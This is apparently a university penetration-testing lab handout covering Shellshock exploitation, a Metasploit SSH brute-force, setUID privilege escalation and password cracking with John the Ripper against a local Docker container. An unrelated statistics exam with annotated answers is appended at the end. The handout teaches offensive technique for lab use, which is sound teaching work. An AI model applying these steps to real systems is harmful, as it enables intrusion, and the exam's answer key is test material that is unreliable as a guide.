Table of Contents Project 1: Introduction to Penetration Testing………………………………………………………………. 2 Introduction……………………………………………………………………………………………………………… 3 Learning Goals………………………………………………………………………………………………………….. 3 Virtual Machine…………………………………………………………………………………………………………. 4 Minimum Hardware to Run the Project 1 VM:………………………………………………………………. 4 Networks………………………………………………………………………………………………………………….. 5 Networking in Docker…………………………………………………………………………………………….. 5 Environment Setup:…………………………………………………………………………………………………… 6 Project Tasks (100 points):………………………………………………………………………………………….. 7 Setup……………………………………………………………………………………………………………………. 7 Task 1: Network Scanning (10 points)……………………………………………………………………….. 9 Task 2: Exploit the Shellshock Vulnerability (20 points)…………………………………………….. 10 Task 3: Brute Force with Metasploit (25 points)……………………………………………………….. 11 Introduction to Metasploit……………………………………………………………………………………….. 12 Task 4: Privilege Escalation (20 points)……………………………………………………………………. 17 Task 5: Password Cracking (25 points)…………………………………………………………………….. 18 Background on Using John the Ripper………………………………………………………………………… 18 Task 5.0 Demonstration of John the Ripper – Not For Credit…………………………………………. 18 Extra Task 6 – Optional, Not for Credit……………………………………………………………………. 21 Task 6 Bypass Authentication with HTTP Request Smuggling………………………………………… 22 Deliverables:…………………………………………………………………………………………………………… 23 Reminders:……………………………………………………………………………………………………………… 23 Acknowledgments:………………………………………………………………………………………………….. 24 Appendix 1 – Resources / Links…………………………………………………………………………………. 24 Appendix 2 – Running the VM on an ARM-based Mac………………………………………………….. 25 Emulating x86/x64 on Apple MX Chipset………………………………………………………………… 25 Disclaimers……………………………………………………………………………………………………………… 26 Requirements………………………………………………………………………………………………………….. 26 Obtaining the Virtual Disk Image from the OVA…………………………………………………………… 26 Creating the Emulated Virtual Machine……………………………………………………………………… 26 Configuring the Emulated Virtual Machine…………………………………………………………………. 27 Completing Course Projects via SSH…………………………………………………………………………… 27 Obtaining the VM’s IP address…………………………………………………………………………………… 28 Completing Project 1 over SSH………………………………………………………………………………….. 28 Appendix 3 – VirtualBox Networking………………………………………………………………………….. 29 NAT Networking………………………………………………………………………………………………………. 29 Bridged Networking…………………………………………………………………………………………………. 30 Restarting VM Networking………………………………………………………………………………………… 30 Forwarding Ports to Your Host…………………………………………………………………………………… 30 Appendix 4 – VM Troubleshooting…………………………………………………………………………….. 32 Closing……………………………………………………………………………………………………………………. 33 Summer 2025Security WarningThis project involves port scanning and the programmatic creation of network attacks and other hacking techniques. Be certain that you always direct attacks at the Docker container ONLY. Accidentally scanning outside your local network could have serious consequences. The Docker network is on 172.22.0.0/24 (CIDR notation) in the VM, do not scan other networks!Penetration testing is an important part of ensuring the security of a system. This project introduces some of the common tools used in penetration testing, while also exploring common vulnerabilities (such as Shellshock and bit exploits). In this project, you will gain hands-on experience by exploiting a server running inside a Docker container, hosted within a virtual machine (VM). You will better understand the Shellshock vulnerability, how privilege escalation can occur, and how to crack weak passwords — all crucial elements in penetration testing.On September 24, 2014, a severe vulnerability in Bash, nicknamed Shellshock, was identified. This vulnerability could exploit many systems at the time. In this project, you will gain a better understanding of the Shellshock vulnerability by exploiting it to attack a machine. The objective of this project is to get first-hand experience on this interesting attack, understand how it works, and think about the lessons that we can get out of this attack.There are Tasks centering on the use of Metasploit and getting a privileged shell on the Docker container. There is also a new optional task, Task 6 HTTPSmuggling, that we hope students will try, but is not part of the graded project.In this project, you will: For this semester’s project we are releasing a new virtual machine (VM). It’s x86based, using Xubuntu 24.04 which uses the xfce user interface. This is done to require less processing power than the Gnome-based full Ubuntu release for graphical user interface (GUI) users.One GUI note about xfce, if you try to grab the lower corners of windows it’s hard to grab and resize diagonally. It’s much easier to grab and drag the upper corners of windows.We expect some people to run the VM on older CPUs. There’s no hard line of what the minimum specification is, these are guidelines, your experience may vary:If you are trying to use our x86-based VM under emulation on an ARM-based Mac, then you should NOT expect to be able to use the xfce-based GUI environment. It might work, but it will be very slow. Instead, ARM-based VM users will be using ssh to access the services needed on the VM.We only provide limited support here, M-based Macs are not a supported platform for CS 6262. Please see Appendix 2 for instructions on how to attempt to make this work on an ARM-based Mac.For your convenience we have opened port 22 on the VM. The VM runs the openssh server. In VirtualBox, you can set up Port Forwarding, see Appendix 2 for information. Once you set up port forwarding of the VM port 22 to your chosen port on your host, you can simply use ssh localhost:chosen_port_number to login to the VM from your host.Because we have opened the ssh port on the VM, the VM is only as secure as your network. In theory, your typical home network has a router that uses Network Address Translation and blocks all incoming ports from incoming connections from the outside world. This means in theory, assuming that your router isn’t hacked, attackers on the Internet can try to attack your routers WAN IP Address, but the router will rebuff any connection that wasn’t originated in your network. Also in theory, your ISP is doing something to block these attacks, but some will get through.The minute you open a port on your router for your favorite game, you have just opened a can of worms. We strongly recommend you turn the port forwarding on your router OFF while working on this project. Having said that, we also recommend you turn it off all the time.Consider where the instructions tell you to access the vulnerable website at the target IP address and vulnerable target port. In the VM you would enter the IP address of the Docker container and the port number together into the browser.Instead, if you are logged in from your host, you have to consider what networking style you are using in Virtual Box (or your choice of virtualization software. You may need to use Bridged networking, see Appendix 3.Once you set up forwarding, the vulnerable web server port is available on the port you choose on your host. The IP address will be different. We forward the target webserver port on the Docker container to the VM itself. Thus, it’s possible to use the VM’s localhost address followed by the target port number to access the vulnerable website like: http://localhost:9999.See Appendix 3 for more information about two popular VirtualBox networking styles and other VirtualBox information.Relative to the Docker network, remember that the VM has one network interface that talks to your host, and another interface to talk on the Docker network. You’ll see more about this in the details of Task 2. The Docker network is 172.22.0.0/24 on this VM. Google CIDR (related to networking) if this notation doesn’t make sense to you, it’s CIDR notation to denote a network with 254 nodes. The VM Docker interface and the Docker container both live in this network address range.Here we repeat our warning to only use nmap or zenmap on the Docker network! You will be provided a virtual machine (VM) based on Xubuntu 24.04 Linux, preinstalled with necessary tools like Metasploit and John the Ripper. Inside this VM, a Docker container will run, it has various vulnerabilities that you will attack.Provided Files: Steps:./StartShockServer.shNote: Once you start the Docker container, it will restart itself if it dies, unless you run the ./StopShockServer.sh script. The first step in any penetration test is to gather information about the network and servers you’ll be exploiting. In this task, you will perform network scanning and answer a few questions based on your findings. On startup, the shellshockvulnerable container in the VM runs a webserver and listens to multiple ports for incoming messages. It also runs a ssh server.In the VM logged in as penteststudent, open a Terminal Emulator window.First, before doing anything else, run the command to start up the Docker container that runs the vulnerable services:You should see a message after a few moments that the container has started. While it’s not strictly necessary, when you are shutting down or rebooting the VM, you can run the shutdown command first:./StopShockServer.sh Now, let’s investigate the network. At the command prompt, enter this command:You will see the output pictured in Figure 1.In the output you will see various network interfaces. The important ones are:lo — this is the loopback interface, it refers to the VM itself. It’s the same, effectively, as 0.0.0.0 and 127.0.0.1 (with minor differences).enp0s3 — this is the VM interface with your host. If you are trying to ssh into your VM from your host computer, you use this address. You may need Bridged networking for this, see Appendix 2. For Ubuntu24.04, enp0s3 always seems to be the name chosen for the first interface, instead of the traditional eth0.docker0 — this is the default Docker network on 172.17.0.0/24, we will not be using it.br-a795c89aa411 — this is an important interface, it’s the VM’s interface on the Docker network. From this entry you can see the Docker network is 172.22.0.0/24, note this address as it will come in handy for the next steps. It’s possible the interface will use a different br-xxxx ID, though we wouldn’t expect it to. Here you can see the VM’s Docker address is 172.22.0.1. Figure 1 — Output of ip a command shows the different network interfaces’ propertiesThere’s also (when the container is running) a veth-xxxx interface. This is the virtual ethernet interface for the running Docker container. While you could use the IPV6 address you see in the output, for this project you should use IPV4 exclusively, don’t use IPV6 addressing.Now it’s time to get down to the tasks:Find the IP address of the vulnerable Docker container on the NAT network using nmap or zenmap (the GUI version of nmap). You’ll find both installed in the VM, ignore any GTK errors if you run zenmap from the command line.Remember to limit your scans to the 172.22.0.0/24 network and nodes on that network only! Don’t scan outside the Docker network!IMPORTANT: For people who are logging into the VM using ssh to do their work, we have forwarded ports from the Docker container to the VM so you can complete the port forwarding in VirtualBox on your host.You will see ports exposed on 172.22.0.1, the VM. These simply reflect the ports on the actual Docker container, so you can ignore ports on this address when answering questions in the assignment_questionnaire.txt.NOTE: You have zenmap on the GUI menu to use, it’s more intuitive to use than the command line version. It will complain that it’s not run as root, that’s OK.Use an Intense scan in zenmap to identify all the open ports on the Docker container’s webserver and submit the port numbers which handle http traffic to the Apache web server and the Python web server on the VM. You can determine the server type in zenmap, and with nmap on the command line with the correct options.While zenmap scans all ports, nmap by default only scans the top 1000 ports, to scan EVERY port from 1-10000, you need to specify -p 1-10000 in the nmap command. All the ports you’re looking for are lower than port 10000.One suggested workflow for zenmap is to do a “quick scan” of the 172.22.0.0/24 network to identify nodes on the network. Then inspect interesting nodes more closely with further, more intense scans.If you are scanning and not finding web server ports, did you remember to run ./StartShockServer.sh in your home directory?Submit in assignment_questionnaire.txt:In this task, you will launch the Shellshock attack on a remote web server. Many web servers enable Common Gateway Interface (CGI), which is an older method used to generate dynamic content on Web pages and Web applications.Many CGI programs are written using a shell script. Therefore, before a CGI program is executed, the shell program will be invoked first. This can be triggered by a user from a remote computer, typically using the curl command. To access this CGI program on the Docker container from the VM browser or command line, you need to first make sure you started the Docker container using:./StartShockServer.sh. Then, you can either use a browser by typing the following URL:http://:/cgi-bin/shellshock.cgi or use the following command line program curl to do the same thing:For this task, your goal is to launch the attack through this URL with the proper parameters, such that you can achieve something that you cannot do as a normal remote user. You will get a shell directly on the container, without using ssh to login or even knowing a password! For example, once you have a shell, you can directly execute a file on the container or look up information about files located on the container.When you successfully launch an attack, please execute the /bin/task2 program (which needs your GT username as the input) inside the VM. It will generate the submission hash for you.For students that want to verify their work, here’s an example correct input/output for running /usr/bin/task2:$ /usr/bin/task2 gburdell3 Here is your task2 hash: Submit in assignment_questionnaire.txt:While you’re in a shell and able to inspect the file system, look around /usr/bin for files that start with “task.” Run a ls -l on /usr/bin/ and get familiar with the variety of programs found there. One of them is important for Task 4!NOTE: Keep your shell open for part of Task 3, you need to search the filesystem for two files needed for Task 3. Now that you have established a foothold on the server through Shellshock, you’ve discovered that the /usr/bin/task3 executable is owned by a different user account that has enhanced privileges. To execute this file and complete the challenge, you’ll need to gain access to that user’s account.During a penetration test, weak credentials remain one of the most common vulnerabilities found in systems. Attackers often exploit this by attempting to authenticate using common username and password combinations. That’s where Metasploit’s brute force capabilities come in.Metasploit includes powerful auxiliary modules for password attacks, along with extensive wordlists of commonly used usernames and passwords. For this project, we’re going to use Metasploit’s SSH brute force module to identify weak credentials on the Docker container. This will demonstrate how penetration testers systematically identify accounts with poor password hygiene.Metasploit works by automating login attempts against the SSH service, trying different username and password combinations from predefined wordlists. This is a critical skill for penetration testers, as password spraying and credential stuffing attacks are frequently used in real-world scenarios.This approach teaches students about:After a moment, the Metasploit Framework console (msfconsole) will load. For this project, msfconsole is the main way of accessing Metasploit. While there are other tools and command prompts associated with Metasploit, msfconsole is suitable for the related tasks of this project. It may take a little time for Metasploit to load, you are ready when you see the msf6 prompt at the bottom: Figure 2 – Metasploit opening screenThe text-art image will likely be different. You can ignore the warning about Metasploit being more than two weeks old. Wait a minute for the msf6 > prompt before entering commands. (in msfconsole): Figure 3 – Shows 752 results for search scanner command The reason there are so many results is that “scanner” is a class ofauxiliary modules (as seen by there being so many modules beginning with “auxiliary/scanner”). So, searching for “scanner” (or “scan”) will give everything at all related to network or vulnerability scanning. Figure 4 – Narrowed down results for grep portscan search scanner command That seems a little better. Only 7 results. Since we’re scanning for open tcp ports, let’s use: “auxiliary/scanner/portscan/tcp”. To use this metasploit module, you should run the command: You will get this response: Figure 5 – Shows the new prompt with scanner/portscan/tcpYou now see “auxiliary(scanner/portscan/tcp)” after the prompt, indicating you are using the auxiliary(scanner/portscan/tcp) module. Figure 6 – Viewing options such as RHOSTS While each of the options is marked as required, most of the prefilled values work for our purposes. The only one we need to change is RHOSTS. RHOSTS should be the IP address of the host we want to scan. In this case, you should set it to the IP address of the Docker container, that you found in part 1. You can use the command: Now try running options again and ensure the RHOSTS option is set to the correct IP address for the Docker container. Now you’ve seen an example of how to use Metasploit. You’ll follow a similar process when exploiting the vulnerability to run /bin/task3. Make note of the ssh server port found, if you didn’t note it during Task 1. Task 3 Assignment: Normally you would allow some amount of time waiting for the ssh attack to complete, as the attack will try every combination of usernames and passwords in the username and password files. For convenience we have set up these files to finish very quickly, you won’t have to wait long to get in. NOTE: You should keep the reverse shell running after finishing Task 3, as you will need it in Task 4. Submit: Your goal in Task 4 is to upgrade the privilege for your command shell by exploiting a setUID vulnerability. You will run /bin/task4 with a higher effective user id (euid), not the default user “www-data”. To be clear, you will still see the www-data user and group, but when you run the id command, you will also see an “euid” (effective user id) of 0. You will learn about various commands in Linux and find one that lets you escalate your privileges.Assignments: NOTE: Remember to keep the shell open from the previous task, or recreate the steps needed to get the shell in Metasploit. As a first step, type id in your shell. You should see system_admin which is your user ID. Now, run /usr/bin/task4 gt_username. You will see a permission denied error. That is because /usr/bin/task4 is configured to allow only a privileged user to run it. Thus, you need to find a way to run /bin/task4 as a privileged user. A feasible approach is to spawn a shell running as the “root” user and run task4 through it. Useful Resource: https://gtfobins.github.io/ You may want to look at the output of ls -l /usr/bin for a program which has a higher privilege than the default user and run /bin/task4 gt_username in the shell spawned. Also look at the commands featured on the link above. Please leave your answers in assignment_questionnaire.txt. NOTE: Keep your Task 4 root shell open for Task 5.A valuable part of any penetration test is password cracking. While there may be no known vulnerabilities in a system, a weak password could be just as damaging in allowing an attacker to gain access to a system or view sensitive information once they gain access. We’re going to look at two kinds of weak passwords in this task: passwords that are too short, and passwords that can easily be guessed via password scraping.Remember you have learned about the Linux find command. On the container, there are two password-protected files. task51.zip is password-protected with zip, while task52.gpg is encrypted with gpg, a common file encryption tool inLinux. GPG is the open-source version of PGP – Symantec owns PGP. It is typically licensed for a fee.We already know the developers of this web server are not very security savvy, since they let a shellshock vulnerability plus a setUID exploit give a high privilege shell on their machine. So, chances are they did not pick very secure passwords for these secret files. Your goal in this task is to crack the passwords of these two files using John the Ripper (a popular password cracker) and cewl (a password scraper).That hash is:Username: myuserPassword: password12Format: MD5-Crypt (–format=md5crypt)john –format=md5crypt -wordlist=/home/penteststudent/rockyou.txt hello.hash There’s no space between — and wordlist. You will see this output:Cracked 1 password hashjohn –show hello.hash The output is:In this task, you will analyze two password-protected files suspected of containing sensitive content:These files have been encrypted using weak or guessable passwords. Your job is to recover these passwords using password cracking techniques and tools.To prepare for these tasks, you need to download the files from the Docker container to your VM so you can work on them with John the Ripper tools.Remember you are using your login from Tasks 3 and 4, this is a Metasploit shell.Once you download the files from the Docker container, be sure to switch to a VM Terminal where you’re not logged into the container anymore. You do the rest of Task 5 on your VM, not in the Docker environment.You’ll work with: This task reinforces your ability to:Hint: This will produce a hash line John can use as input.Hint: Try using –incremental to perform a brute-force attack.Hint: Use the unzip command and supply the recovered password.Record the output hash in your assignment questionnaire.Hint: Pay attention to how long this process takes and whether it seems productive.Ask yourself: Hint: You may need to configure cewl to follow links to profile pages.Hint: Use the –wordlist option and allow default –rules to permute the words.This command is one line, substitute your cracked password.Record the resulting hash in your assignment questionnaire.In your assignment_questionnaire.txt, include: We have a new task you can help us test. If you are enjoying attacking the Docker container so far, then you can continue the fun with this task. We would appreciate any feedback on this task for when we incorporate it into the project for future semesters.We’re not 100% sure we have the HTTP Smuggling vulnerability set up correctly, but you can spend some time researching the weakness. We are running vulnerable Apache2 version 2.4.32.UPDATE: Hold off working on this unless you want to hack at it, based on student input I don’t think I have a vulnerable version of the Apache2 server on it. I will produce a new VM with the correct server version soon, thanks for your patience.In late 2024 a new Common Vulnerability and Exposure (CVE 2024-40725) came out for the Apache2 web server. The Apache2 server sees widespread use – as of summer, 2025, Apache reportedly had a 15-20% share of the server market. Nginx was the leader, Apache second, Cloudfare Server third and Lightspeed server fourth. Often these different servers are used in combination, with nginx acting as a front end (reverse proxy) for back-end servers that run on Apache2.In this project Apache not only serves up a site directly, it’s also a reverse proxy for a Python web server. The Python back-end server is configured with these routes:HTTP Request Smuggling is a critical web security vulnerability that occurs when front-end and back-end servers interpret HTTP requests differently. This can allow attackers to bypass security controls and access protected resources.The Python webserver has a protected administrative area at /protected that requires authentication. Your goal is to bypass this authentication and access the protected resource to retrieve your personalized flag. Submit to Gradescope: Important:That’s it, you’re done with Project 1!This project is adapted from SEED Labs by Wenliang Du, licensed under GNU Free Documentation License, Version 1.2.Here are some resources for the various concepts and tools presented in the project:nmap – https://nmap.org/book/man.html#man-description zenmap – https://nmap.org/zenmap/ Task 3 – MetaSploit https://docs.rapid7.com/metasploit/bruteforce-attacks/ https://www.offsec.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/Task 4 – Root Privilege Escalation Getting a root shell –https://gtfobins.github.io/ (compare this list to the output of ls -l /usr/bin on the Docker container, once you already have a regular shell. Searching inside the Docker container with find /usr/bin -perm 4000 doesn’t work as it should, we’re not sure why it doesn’t.) Task 6 – HTTP Request Smuggling – https://portswigger.net/web-security/request-smuggling https://www.imperva.com/learn/application-security/http-request-smuggling/ https://nvd.nist.gov/vuln/detail/cve-2024-40725 https://httpd.apache.org/security/vulnerabilities_24.htmlGeneral links:Shellshock – https://en.wikipedia.org/wiki/Shellshock_(software_bug)Metasploit – https://www.offensive-security.com/metasploit-unleashed/John the Ripper – https://www.openwall.com/john/doc/CeWL – https://tools.kali.org/password-attacks/cewlWebserver Marketshare –https://w3techs.com/technologies/overview/web_server VM Download link: Will be posted on Canvas on the Machine Learning project when we release it. Emulation on ARM-based Macs doesn’t always work, it can be very slow. You should use ssh to access the VM using your hosts tools like Terminal, curl and your browser if needed. Credit where credit is due, TA Eric Johnson wrote these instructions and we modified them for CS 6262 students for Project 1. We decided to provide some details below on how to configure emulation, but these instructions come without any warranty – we cannot grant extensions due to emulation issues. SHA256: Note: None of the material below is necessary for running in VirtualBox on an Intel-based machine, but you can run the VM headless using the same SSH instructions as below: While it is possible to use emulation to run the CS6262 VMs it is important to note that it is not officially supported. You will need to be familiar with SSH and using the terminal as the Linux GUI is not very responsive. You will find it difficult to impossible to finish the project using the VM GUI. Please understand the teaching assistants (TAs) can provide only very limited support on emulation. You will NOT receive extensions due to technical difficulties with the VM. Using emulation to complete the homework for the class is done at your own risk. Homebrew — https://www.qemu.org/download/#macos UTM — https://mac.getutm.app or other any other emulation toolFor the purposes of this tutorial we will use the CS6262Project1-R01.ova name as the VM filename, be sure to adjust the instructions for your VM image name. Note that these instructions were created using a Linux VM and the exact commands may vary slightly on MacOS. This will result in this file being created:CS6262Project1VM-disk002.vmdk qemu-img convert -O qcow2 CS6262Project1VM-disk002.vmdk CS6262Project1VM-disk002.qcow2 Note these instructions assume that you are using UTM. The instructions will differ if you are not using UTM. The VM settings window should have opened once you saved the VM. Now you’ll need to configure the VM to use your .qcow2 image to boot the course VM. Given the fact that emulating the Linux UI typically results in poor user experience, the expectation is that you would use SSH to complete all project activities. If you are unable to use SSH to perform a specific task then you’re unlikely to be able to complete the project using an emulated VM.Note that it is likely the second interface, denoted by `2:`The default subnet for UTM is typically `192.168.64.0/24`2: enp0s1: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether ee:50:4e:d3:b0:d1 brd ff:ff:ff:ff:ff:ff inet 192.168.64.12/24 brd 192.168.64.255 scope global dynamic noprefixroute enp0s1 In this example: We will assume that the IP address for the course VM is 192.168.64.12 for the purposes of this example. Your IP address may vary. Please use the address identified above to complete each SSH command. Ensure that you have Chrome installed on your Mac.Connect to the VM via ssh:ssh [email protected] This will get you a bash session running on the VM, presented in your host interface. For portions of the project that can be done from the command line (all of it), use this window. You may want to open a second windows for certain types of attacks, though it isn’t required or necessary. If you want to view the project website, then you need port forwarding. You can possibly set this up in UTM/QEMU, the author isn’t sure. You can also use SSH tunneling to forward the vulnerable website to view from your host: Ssh -L ssh -L 127.0.0.1:9999:127.0.0.1:9999 [email protected](note the port 9999 is just an example, use the port you discover with nmap / zenmap) We hope you have been able to work your way through these instructions, please let us know of any suggested changed on Ed Discussion.If you look at the networking settings in VirtualBox, you’ll see various network styles available. We will look at two of those here: NAT and Bridged. Figure 7 – Network Types in VirtualBoxIn VirtualBox NAT Networking, the VM accesses the Internet through a softwarebased router created by VirtualBox. This is the simplest and default method of networking in VirtualBox. The VM has Internet access, but you typically can’t access the VM from your host. The IP address for the VM will be in the range10.0.2.0/24.This networking style is fine if you plan to do all your work in the VirtualBox VM’s GUI. You will be able to work in a shell in the VM and will have full network access from within the VM to the Docker container running in the VM. From the VM you’ll also be able to access the Internet.This is the safest networking style in VirtualBox, as the VM is not accessible from the network.For those who want to be able to ssh into the VM from their host machine, you’ll want to choose Bridged networking in the VM. This promotes the VM to be a full member of your network. This means instead of a 10.0.2.0/24 address, your VM will get an address on your home network. We do not recommend Bridged Networking if you are in a work environment or otherwise exter.Once you switch to Bridged networking, you should see the IP address of the VM change to be an address on your network, which is typically in the range 192.168.1.0/24 on a home router.We have seen behavior in VirtualBox that when you switch between NAT and Bridged networking, the IP address of the VM will not update. In this case, please run the following command in the pentestuser’s home directory:./RestartNetworking.sh This runs the following commands:You can’t normally run these commands as penteststudent, so use the provided script to update your networking on the VM.We might be giving away the game a bit here but it’s OK. As we have noted, the Docker network is on 172.22.0.0/24. It’s easy enough to run ip a and discover the VM’s IP address is 172.22.0.1. As noted previously, you will see the Docker container’s ports duplicated on the VM. This is to make them available for port forwarding to your host if you desire to work from your host.To set up port forwarding, open the VM’s Network settings. You can change network settings while the VM is running. Figure 8 – Choose the Network OptionThis only works if you’re in NAT networking: you will see a port forwarding button in the VM’s Networking settings: Click this button and you’ll see the Port Forwarding Rules dialog appear: Click the + icon to create a new rule, under Host Port enter the port you want to use on your host, and under Guest port enter the port numbers the VM’s Docker container is using. If you’re already running something on Port 22, for example you run Windows Subsystem for Linux (WSL), then use a different port on the host side. The VM’s ssh is setup on port 22.This will make the designated ports available on your host’s localhost interface.You can then run a command like this to ssh into the vm, per the settings above:You can also access the Docker container’s published ports from localhost. Let’s say you found the Apache 2 server on the container on port 9999. Then you could use this curl command from your host to access the webpage with curl or a browser:curl http://localhost:9999 This VM was produced on a Windows machine. If you are on an Intel-based Mac, you may see an error like this when starting the VM: In this example we are using a Bridged network, regardless of whether you use NAT or Bridged, to fix this problem choose your eth0 interface in the Network Settings: If you can select the adapter type (if it’s not greyed out like here) try different adapters starting with the Intel desktop adapters: Thanks for going through the project. We hope you see by now, while this is a long document, most of it is introductory and background information. We would appreciate any feedback, positive or negative, about out choice to include so much extra information about Docker, Networks and VMs in this document. Did you find it helpful? Was the size of the document so large that it initially discouraged you? Thanks for any feedback, please use the Document Feedback post on Ed to make your comments.Thank You
Write your name and section number at the top right of this page: Class Section Number Bret 8:50 001 Sahifa 1:20 003 Miranda 9:55 004 Sahifa 3:30 005 Sahifa 8:50 006 Cameron 1:20 007 As you complete the exam, write your initials at the top right of each other page.If you need more room, there is a blank page at the end of the exam, or we can give you some scratch paper. Some multiple choice questions are “Select ONE” while others are “Select ALL that apply”. Pay attention to the question type and only mark one option if it says “Select ONE”. Fill in the circles completely. 1. A dataframe lions has 32 rows, each representing a unique lion. It has two numeric columns: age , each lion’s age in decimal years, and proportion.black , the percentage of that lion’s nose which is black. Finally, it has a logical column adult , which is TRUE if age is greater than 3 and FALSE otherwise. Consider the following code which attempts to make a scatter plot of age on the X axis vs. proportion.black on the y axis.Which of the following statements are true about errors in the above code? Select ALL that apply. fill = adult must be changed to color = adult to color the points differently. alpha = 0.5 must be moved outside of aes() , like size = 2 currently is. size = 2 must be moved within aes() , like alpha = 0.5 is. fill = adult must be moved to the aes() in the ggplot() call, not geom point() . 2. Using the same dataframe as Question 1, consider the following code which creates a new dataframe, lions summary .Which of the following statements are true about lions summary ? Select ALL that apply. lions summary has 2 rows. lions summary has 2 columns. (False: adult, averageAge, and averagePropBlack.) lions summary has a column called ‘adult‘. If there were any NA values in the age column of lions , all the values of averageAge in lions summary will be NA (Sneakily false: If there are only NA values in one category of adult, the other can still function!) 3. A random viewer’s ideal movie length, in minutes, is approximately X ∼ N(120,15). Actual movie lengths are given by Y ∼ N(143,19). (a) Which R code below calculates the probability that a random movie is shorter than the 40th percentile for ideal movie length? Select ONE. qnorm(0.4, 120, 15) %>% pnorm(143, 19) qnorm(0.4, 143, 19) %>% pnorm(120, 15) pnorm(0.4, 120, 15) %>% qnorm(143, 19) pnorm(0.4, 143, 19) %>% qnorm(120, 15) (b) What movie length y corresponds to a z-score of 1? Select ONE. 19143 124162 (143 + 19 = 162) 4. Your friend claims that a random variable, X, follows the following probability distribution:Which of the following are true about your friend’s claim? Select ONE. This distribution has negative values of x, therefore X is not a random variable. This distribution has negative values of P(X = x), therefore X is not a random variable. The area under this distribution is not 1, therefore X is not a random variable. X is a valid random variable. 5. Consider ordering a ”footlong” (12 inch) sub from Subway. Consider trying to estimate µ, the average length of the sub you receive when you order a 12 inch sub. You do this by ordering 40 footlong subs and measuring their lengths in inches. (What a great problem this is.) You observe that the average length of your 40 subs is 11.5 inches, and the standard deviation of their lengths is 0.4 inches. Consider testing H0 : µ = 12 vs. Hα : µ < 12. Write a numeric expression (only containing numbers and artihmetic symbols like + and ×) for the test statistic of this test. x¯ − µnull √ sx/ n Answer:6. The fictitious distribution of the number of children in a household (X) is given below. x 0 1 2 3 P(X = x) ? 0.4 0.25 0.15 (a) Which of the following statements about X is true? Select ONE. X is a discrete RV. X is a binomial RV. X is a continuous RV. X is a normal RV. (b) What value of P(X = 0) makes this a valid probability distribution? Select ONE. 0.1 0.15 0.2 0.25 (c) What is the median number of children per household? Select ONE. 0 1 2 Not enough infomration to determine 7. Data is collected on the duration each winter that a lake’s surface is frozen over a period of 103 consecutive years. The correlation coefficient between the variables is r = −0.4. The year variable has a mean ¯x = 1950 and a standard deviation sx = 30. The freeze duration variable has ¯y = 90 and a standard deviation sy = 17. Consider fitting a simple linear regression model to this data. Write a numerical expression (using only numbers and arithmetic symbols like + or ×) for the predicted freeze duration in the year 1890. No need to simplify. Answer: (1890 is two x standard deviations BELOW the mean of x, so our predicted value will be r * two y standard deviations below the mean of y.)* 90 + (−0.4) × (−2) × 17 *You could also take the long way:* and βˆ0 = 90 − βˆ1 ∗ 1950, so ˆy1 = βˆ0 + βˆ1 ∗ 1890 8. We continue to consider the lake freezing data from Problem 7. A 95% confidence interval for the freeze duration of the true regression line at x = 1890 has the form: yˆ1 ± c × SEC A 95% prediction interval for the duration that the lake was frozen in the single year 1890 has the form yˆ1 ± c × SEP where c is a critical value from some distribution and SEC, SEP are some positive values. Reminder: There are 103 years in the dataset. Which R code calculates the numeric critical value c? Select ONE. qnorm(0.95) qnorm(0.975) qt(0.95, 101) qt(0.975, 101) qt(0.95, 102) qt(0.975, 102) 9. Using the expressions from the previous problem, circle the true relationship between SEC and SEP and briefly explain why. SEC < SEP SEC = SEP SEC > SEP Answer: A confidence interval for the height of the regression line is narrower than a prediction interval for at the same x point; but they have the same center and critical value. Therefore, it must be that SEC < SEP. 10. Consider trying to estimate the proportion of UW-Madison undergraduate students who will graduate at the end of this semester, p. You ask 50 random students, and 7 of them will graduate at the end of the semester. Consider using this information to calculate a confidence interval for p. Which of the following statements are true? Select ALL that apply. If we were to calculate an Agresti-Coull confidence interval for p, its center would be (7 + 1)/(50 + 2). (False: It would be (7 + 2)/(50 + 4).) If we were to calculate a Wald confidence interval p, its center would be 7/50. The upper bound of the Agresti-Coull confidence interval would be greater than the upper bound of the Wald confidence interval. (it’s shifted towards 0.5) As we increase the confidence level of our interval towards 100%, our interval would widen and approach [0, 1]. 11. We are interested in comparing the proportions of individuals with bachelor degrees among of adult men aged 25 and older in the states of Minnesota and Wisconsin. Let pM and pW represent these two population proportions. In random samples of nM = 300 Minnesota men and nW = 400 Wisconsin men aged 25 and older, the numbers of individuals with bachelor degrees are xM = 90 and xW = 100. Without simplification, write a numerical expression using provided data for the standard error SEci used in a 95% confidence interval for pM − pW of the form (point estimate) ± zcrit × SEci when using the Agresti-Coull method. Answer: SEci 12. In the setting of the problem above, write a numerical expression using provided data for the standard error SEht of the test statistic Z: pˆM − pˆW Z = ∼ N(0,1) SEht Answer: SEht 13. Suppose that the test statistic from the previous problem has the value z = 1.47 and that the p-value from a two-sided test is 0.14. Which of the following statements are true? Select ALL that apply. The test is statistically significant at an α = 0.05 level. A 95% confidence interval for pM − pW will contain the value 0. ( insignificant p-value) 14. You ask a group of 30 people from Country A to each privately give you a random number between 1 and 1000. You then ask a group of 40 people from Country B to each privately give you a random number between 1 and 1000. Let µA be the true average value that all members of country A would give upon this request, and similarly for µB. You are interested in the quantity µA − µB. Which of the following statements are true about how to approach this problem through statistical inference? Select ONE. Two-sample means inference is impossible to conduct because the sample sizes are different. Two-sample means inference is impossible to conduct because the random variables are technically discrete. Two-sample inference is more appropriate than paired-sample inference in this case. Paired-sample inference is more appropriate than two-sample inference in this case. 15. Assume the correct value of the test statistic from problem 14 is -50. Which R code correctly calculates the p-value for this test? Select ONE. pt(-50, df = W) 2*pt(-50, df = W) 2*pt(abs(-50), df = W) 1 – pt(-50, df = W)
